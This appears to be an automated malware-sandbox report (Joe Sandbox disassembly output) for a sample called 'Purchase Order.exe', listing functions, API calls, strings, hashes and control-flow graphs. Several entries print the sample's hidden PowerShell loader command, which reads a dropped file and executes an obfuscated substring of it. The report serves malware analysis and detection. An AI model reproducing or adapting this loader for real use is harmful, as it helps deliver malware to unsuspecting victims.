                                                          • lstrcatA.KERNEL32(Execute: "powershell.exe" -windowstyle hidden "$Encloser=Get-Content 'C:\Users\user\AppData\Local\potentially\Avantgarders\Epilogic.bac';$Gulvhjderne229=$Encloser.SubString(2901,3);.$Gulvhjderne229($Encloser)",00402FFA,00402FFA,Execute: "powershell.exe" -windowstyle hidden "$Encloser=Get-Content 'C:\Users\user\AppData\Local\potentially\Avantgarders\Epilogic.bac';$Gulvhjderne229=$Encloser.SubString(2901,3);.$Gulvhjderne229($Encloser)",00000000,0041859B,759223A0), ref: 00404FA4
                                                          • SetWindowTextA.USER32(Execute: "powershell.exe" -windowstyle hidden "$Encloser=Get-Content 'C:\Users\user\AppData\Local\potentially\Avantgarders\Epilogic.bac';$Gulvhjderne229=$Encloser.SubString(2901,3);.$Gulvhjderne229($Encloser)",Execute: "powershell.exe" -windowstyle hidden "$Encloser=Get-Content 'C:\Users\user\AppData\Local\potentially\Avantgarders\Epilogic.bac';$Gulvhjderne229=$Encloser.SubString(2901,3);.$Gulvhjderne229($Encloser)"), ref: 00404FB6
                                                          • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404FDC
                                                          • SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404FF6
                                                          • SendMessageA.USER32(?,00001013,?,00000000), ref: 00405004
                                                          Strings
                                                          • Execute: "powershell.exe" -windowstyle hidden "$Encloser=Get-Content 'C:\Users\user\AppData\Local\potentially\Avantgarders\Epilogic.bac';$Gulvhjderne229=$Encloser.SubString(2901,3);.$Gulvhjderne229($Encloser)", xrefs: 00404F68, 00404F7A, 00404F80, 00404FA3, 00404FAF
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1987756231.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1987743110.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987770257.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1988017395.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_Purchase Order.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                          • String ID: Execute: "powershell.exe" -windowstyle hidden "$Encloser=Get-Content 'C:\Users\user\AppData\Local\potentially\Avantgarders\Epilogic.bac';$Gulvhjderne229=$Encloser.SubString(2901,3);.$Gulvhjderne229($Encloser)"
                                                          • API String ID: 2531174081-293989933
                                                          • Opcode ID: 534154c7e412c88fb75b9fbb21228ed2bc61e9f55108b0b726938b2d4222e579
                                                          • Instruction ID: 5247e829223e414f07dbea0a4ec6ac131d28d962b221907bbf4360a320382309
                                                          • Opcode Fuzzy Hash: 534154c7e412c88fb75b9fbb21228ed2bc61e9f55108b0b726938b2d4222e579
                                                          • Instruction Fuzzy Hash: 76218C71D00118BBDF219FA5DC84ADEBFA9EF08354F10807AF904B6291C7798E408FA8
                                                          Function 0040605A Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36libraryCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 698 40605a-40607a GetSystemDirectoryA 699 40607c 698->699 700 40607e-406080 698->700 699->700 701 406090-406092 700->701 702 406082-40608a 700->702 704 406093-4060c5 wsprintfA LoadLibraryExA 701->704 702->701 703 40608c-40608e 702->703 703->704
                                                          APIs
                                                          • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00406071
                                                          • wsprintfA.USER32 ref: 004060AA
                                                          • LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 004060BE
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1987756231.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1987743110.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987770257.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1988017395.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_Purchase Order.jbxd
                                                          Similarity
                                                          • API ID: DirectoryLibraryLoadSystemwsprintf
                                                          • String ID: %s%s.dll$UXTHEME$\
                                                          • API String ID: 2200240437-4240819195
                                                          • Opcode ID: 38f932dad6d10820f3564912fa7e39c047c8ada2afd73a6a353afcde48b08f1a
                                                          • Instruction ID: e3f146f71c0a6e9640e358317deb724d3a5625ccb5f8d81b259ee964bec3998a
                                                          • Opcode Fuzzy Hash: 38f932dad6d10820f3564912fa7e39c047c8ada2afd73a6a353afcde48b08f1a
                                                          • Instruction Fuzzy Hash: D0F0FC3095010566DB14DB74DD0DFEB375CAB08305F14017AA647E11D1D974F9248B69
                                                          Function 00402364 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71registrystringCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 705 402364-4023aa call 402b2f call 402a3a * 2 RegCreateKeyExA 712 4023b0-4023b8 705->712 713 4028cf-4028de 705->713 714 4023c8-4023cb 712->714 715 4023ba-4023c7 call 402a3a lstrlenA 712->715 719 4023db-4023de 714->719 720 4023cd-4023da call 402a1d 714->720 715->714 721 4023e0-4023ea call 402e9f 719->721 722 4023ef-402403 RegSetValueExA 719->722 720->719 721->722 726 402405 722->726 727 402408-4024de RegCloseKey 722->727 726->727 727->713
                                                          APIs
                                                          • RegCreateKeyExA.KERNELBASE(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023A2
                                                          • lstrlenA.KERNEL32(C:\Users\user\Documents\bevisliggrelser.hen,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004023C2
                                                          • RegSetValueExA.KERNELBASE(?,?,?,?,C:\Users\user\Documents\bevisliggrelser.hen,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023FB
                                                          • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\Documents\bevisliggrelser.hen,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024D8
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1987756231.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1987743110.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987770257.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1988017395.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_Purchase Order.jbxd
                                                          Similarity
                                                          • API ID: CloseCreateValuelstrlen
                                                          • String ID: C:\Users\user\Documents\bevisliggrelser.hen
                                                          • API String ID: 1356686001-1664747475
                                                          • Opcode ID: d2cc6d77e9ba14248a047d72dd7d9f6a3aa8facb63e6006dd0d76643cfd04d8e
                                                          • Instruction ID: f509f4240a3e10e7eaa3df5a693eb391f4e90e3bb863c7dbc5285fb3648b227d
                                                          • Opcode Fuzzy Hash: d2cc6d77e9ba14248a047d72dd7d9f6a3aa8facb63e6006dd0d76643cfd04d8e
                                                          • Instruction Fuzzy Hash: 6B117571E00108BFEB10EBA5DE89EAF767DEB54358F10403AF605B71D1D6B85D419B28
                                                          Function 004059D1 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 33COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 730 4059d1-4059db 731 4059dc-405a07 GetTickCount GetTempFileNameA 730->731 732 405a16-405a18 731->732 733 405a09-405a0b 731->733 735 405a10-405a13 732->735 733->731 734 405a0d 733->734 734->735
                                                          APIs
                                                          • GetTickCount.KERNEL32 ref: 004059E5
                                                          • GetTempFileNameA.KERNELBASE(?,?,00000000,?), ref: 004059FF
                                                          Strings
                                                          • "C:\Users\user\Desktop\Purchase Order.exe", xrefs: 004059D1
                                                          • nsa, xrefs: 004059DC
                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 004059D4
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1987756231.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1987743110.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987770257.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1988017395.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_Purchase Order.jbxd
                                                          Similarity
                                                          • API ID: CountFileNameTempTick
                                                          • String ID: "C:\Users\user\Desktop\Purchase Order.exe"$C:\Users\user\AppData\Local\Temp\$nsa
                                                          • API String ID: 1716503409-553797519
                                                          • Opcode ID: a71f6d19a672690ae76045f6a92713abfaab32ef542e638d1cc3651a1fbf987a
                                                          • Instruction ID: dd1ff100f75867a5ea1a308fa9af71207a38e4cfd515e0737c49d63577dfb4aa
                                                          • Opcode Fuzzy Hash: a71f6d19a672690ae76045f6a92713abfaab32ef542e638d1cc3651a1fbf987a
                                                          • Instruction Fuzzy Hash: D0F0E2327082047BDB109F15EC04B9B7B9CDFD1720F10C037FA04EA1C0D2B198448B98
                                                          Function 00402A7A Relevance: 7.6, APIs: 5, Instructions: 67registryCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 736 402a7a-402aa3 RegOpenKeyExA 737 402aa5-402ab0 736->737 738 402b0e-402b12 736->738 739 402acb-402adb RegEnumKeyA 737->739 740 402ab2-402ab5 739->740 741 402add-402aef RegCloseKey call 4060c8 739->741 742 402b02-402b05 RegCloseKey 740->742 743 402ab7-402ac9 call 402a7a 740->743 749 402af1-402b00 741->749 750 402b15-402b1b 741->750 747 402b0b-402b0d 742->747 743->739 743->741 747->738 749->738 750->747 751 402b1d-402b2b RegDeleteKeyA 750->751 751->747 752 402b2d 751->752 752->738
                                                          APIs
                                                          • RegOpenKeyExA.KERNELBASE(?,?,00000000,?,?), ref: 00402A9B
                                                          • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402AD7
                                                          • RegCloseKey.ADVAPI32(?), ref: 00402AE0
                                                          • RegCloseKey.ADVAPI32(?), ref: 00402B05
                                                          • RegDeleteKeyA.ADVAPI32(?,?), ref: 00402B23
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1987756231.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1987743110.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987770257.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1988017395.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_Purchase Order.jbxd
                                                          Similarity
                                                          • API ID: Close$DeleteEnumOpen
                                                          • String ID:
                                                          • API String ID: 1912718029-0
                                                          • Opcode ID: d3726fd62f486be70a3594a3b8fbaf41a64e02cd9dbe9a8d3bb385f6c1247452
                                                          • Instruction ID: e0b40e6d550d0c6dedecb0be42375ee7245bd63e637183e656586a56a8cfacd8
                                                          • Opcode Fuzzy Hash: d3726fd62f486be70a3594a3b8fbaf41a64e02cd9dbe9a8d3bb385f6c1247452
                                                          • Instruction Fuzzy Hash: 66116D31A00108FEDF22AF90DE89EAA3B7DEB54349B104436FA01B10E0D774AE51DB69
                                                          Function 00401BCA Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 76windowtimeCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 754 401bca-401be2 call 402a1d * 2 759 401be4-401beb call 402a3a 754->759 760 401bee-401bf2 754->760 759->760 761 401bf4-401bfb call 402a3a 760->761 762 401bfe-401c04 760->762 761->762 766 401c06-401c1a call 402a1d * 2 762->766 767 401c4a-401c70 call 402a3a * 2 FindWindowExA 762->767 778 401c3a-401c48 SendMessageA 766->778 779 401c1c-401c38 SendMessageTimeoutA 766->779 777 401c76 767->777 780 401c79-401c7c 777->780 778->777 779->780 781 401c82 780->781 782 4028cf-4028de 780->782 781->782
                                                          APIs
                                                          • SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C2A
                                                          • SendMessageA.USER32(00000000,00000000,?,?), ref: 00401C42
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1987756231.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1987743110.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987770257.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1988017395.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_Purchase Order.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$Timeout
                                                          • String ID: !
                                                          • API String ID: 1777923405-2657877971
                                                          • Opcode ID: 22b2b84ea6fcd6b14ed9c5c60211004c3ca56765c3c02eadf23789df00b13e66
                                                          • Instruction ID: 4a41e99441af98314081ed165e1285c49616552a54b2ccacd5bb7637226e5887
                                                          • Opcode Fuzzy Hash: 22b2b84ea6fcd6b14ed9c5c60211004c3ca56765c3c02eadf23789df00b13e66
                                                          • Instruction Fuzzy Hash: 76216271A44108BFEB12AFB0C94AAAD7B75DB44308F14807EF541B61D1D6B885419B29
                                                          Function 004015B3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 0040583A: CharNextA.USER32(?,?,0042AC70,?,004058A6,0042AC70,0042AC70,75923410,?,C:\Users\user\AppData\Local\Temp\,004055F1,?,75923410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405848
                                                            • Part of subcall function 0040583A: CharNextA.USER32(00000000), ref: 0040584D
                                                            • Part of subcall function 0040583A: CharNextA.USER32(00000000), ref: 00405861
                                                          • GetFileAttributesA.KERNELBASE(00000000,00000000,00000000,0000005C,00000000,000000F0), ref: 00401605
                                                            • Part of subcall function 0040540E: CreateDirectoryA.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405451
                                                          • SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\AppData\Local\potentially\Avantgarders,00000000,00000000,000000F0), ref: 00401634
                                                          Strings
                                                          • C:\Users\user\AppData\Local\potentially\Avantgarders, xrefs: 00401629
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1987756231.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1987743110.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987770257.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1988017395.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_Purchase Order.jbxd
                                                          Similarity
                                                          • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                          • String ID: C:\Users\user\AppData\Local\potentially\Avantgarders
                                                          • API String ID: 1892508949-1472172179
                                                          • Opcode ID: c48e80625146c734819094399e099f0f26d2d720ad305fd1441f6452ebd5e2f9
                                                          • Instruction ID: add3044d5edc1dd1b42d505c238b4ff4158083b6ff7b93d5c81ca089004ad06d
                                                          • Opcode Fuzzy Hash: c48e80625146c734819094399e099f0f26d2d720ad305fd1441f6452ebd5e2f9
                                                          • Instruction Fuzzy Hash: C7112736504141ABEF217B650C415BF37B4EAA6325738463FE592B22E2C63C4943A63F
                                                          Function 004054C0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,0042B070,Error launching installer), ref: 004054E9
                                                          • CloseHandle.KERNEL32(?), ref: 004054F6
                                                          Strings
                                                          • Error launching installer, xrefs: 004054D3
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1987756231.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1987743110.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987770257.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1988017395.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_Purchase Order.jbxd
                                                          Similarity
                                                          • API ID: CloseCreateHandleProcess
                                                          • String ID: Error launching installer
                                                          • API String ID: 3712363035-66219284
                                                          • Opcode ID: 47fe2490e17a7e9d962cab7a6b56508ed3a0dd8216b7049c1380fae9186fb834
                                                          • Instruction ID: eccce0787fa873eefbebbfab998d1c477025fc2f998d9ab7e00b955d4b23de72
                                                          • Opcode Fuzzy Hash: 47fe2490e17a7e9d962cab7a6b56508ed3a0dd8216b7049c1380fae9186fb834
                                                          • Instruction Fuzzy Hash: 99E0BFB4A00209BFEB119B64ED05F7B7BACE700704F408561BD11F2190E774A8559A79
                                                          Function 00401E44 Relevance: 4.5, APIs: 3, Instructions: 48synchronizationCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 00404F48: lstrlenA.KERNEL32(Execute: "powershell.exe" -windowstyle hidden "$Encloser=Get-Content 'C:\Users\user\AppData\Local\potentially\Avantgarders\Epilogic.bac';$Gulvhjderne229=$Encloser.SubString(2901,3);.$Gulvhjderne229($Encloser)",00000000,0041859B,759223A0,?,?,?,?,?,?,?,?,?,00402FFA,00000000,?), ref: 00404F81
                                                            • Part of subcall function 00404F48: lstrlenA.KERNEL32(00402FFA,Execute: "powershell.exe" -windowstyle hidden "$Encloser=Get-Content 'C:\Users\user\AppData\Local\potentially\Avantgarders\Epilogic.bac';$Gulvhjderne229=$Encloser.SubString(2901,3);.$Gulvhjderne229($Encloser)",00000000,0041859B,759223A0,?,?,?,?,?,?,?,?,?,00402FFA,00000000), ref: 00404F91
                                                            • Part of subcall function 00404F48: lstrcatA.KERNEL32(Execute: "powershell.exe" -windowstyle hidden "$Encloser=Get-Content 'C:\Users\user\AppData\Local\potentially\Avantgarders\Epilogic.bac';$Gulvhjderne229=$Encloser.SubString(2901,3);.$Gulvhjderne229($Encloser)",00402FFA,00402FFA,Execute: "powershell.exe" -windowstyle hidden "$Encloser=Get-Content 'C:\Users\user\AppData\Local\potentially\Avantgarders\Epilogic.bac';$Gulvhjderne229=$Encloser.SubString(2901,3);.$Gulvhjderne229($Encloser)",00000000,0041859B,759223A0), ref: 00404FA4
                                                            • Part of subcall function 00404F48: SetWindowTextA.USER32(Execute: "powershell.exe" -windowstyle hidden "$Encloser=Get-Content 'C:\Users\user\AppData\Local\potentially\Avantgarders\Epilogic.bac';$Gulvhjderne229=$Encloser.SubString(2901,3);.$Gulvhjderne229($Encloser)",Execute: "powershell.exe" -windowstyle hidden "$Encloser=Get-Content 'C:\Users\user\AppData\Local\potentially\Avantgarders\Epilogic.bac';$Gulvhjderne229=$Encloser.SubString(2901,3);.$Gulvhjderne229($Encloser)"), ref: 00404FB6
                                                            • Part of subcall function 00404F48: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404FDC
                                                            • Part of subcall function 00404F48: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404FF6
                                                            • Part of subcall function 00404F48: SendMessageA.USER32(?,00001013,?,00000000), ref: 00405004
                                                            • Part of subcall function 004054C0: CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,0042B070,Error launching installer), ref: 004054E9
                                                            • Part of subcall function 004054C0: CloseHandle.KERNEL32(?), ref: 004054F6
                                                          • WaitForSingleObject.KERNEL32(?,00000064,00000000,000000EB,00000000), ref: 00401E7E
                                                          • GetExitCodeProcess.KERNEL32(?,?), ref: 00401E8E
                                                          • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00401EB3
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1987756231.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1987743110.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987770257.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1988017395.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_Purchase Order.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcat
                                                          • String ID:
                                                          • API String ID: 3521207402-0
                                                          • Opcode ID: d8b5dce07ba6ac1784379787cb29f6b1de53264d6e7b4441dd29526f16ac5c4c
                                                          • Instruction ID: 17c2ba3ee0df36fac51d80065c7f5b12f0089491b6a7036ff5f4409f8054ee18
                                                          • Opcode Fuzzy Hash: d8b5dce07ba6ac1784379787cb29f6b1de53264d6e7b4441dd29526f16ac5c4c
                                                          • Instruction Fuzzy Hash: 3A014031904114EBEF11AFA1CD8999F7B76EF00358F10817BF601B62E1C7795A419B9A
                                                          Function 00405C16 Relevance: 4.5, APIs: 3, Instructions: 45registryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • RegOpenKeyExA.KERNELBASE(80000002,00405E5B,00000000,00000002,?,00000002,?,?,00405E5B,80000002,Software\Microsoft\Windows\CurrentVersion,?,Execute: ,?), ref: 00405C3F
                                                          • RegQueryValueExA.KERNELBASE(?,?,00000000,00405E5B,?,00405E5B), ref: 00405C60
                                                          • RegCloseKey.KERNELBASE(?), ref: 00405C81
                                                          Memory Dump Source
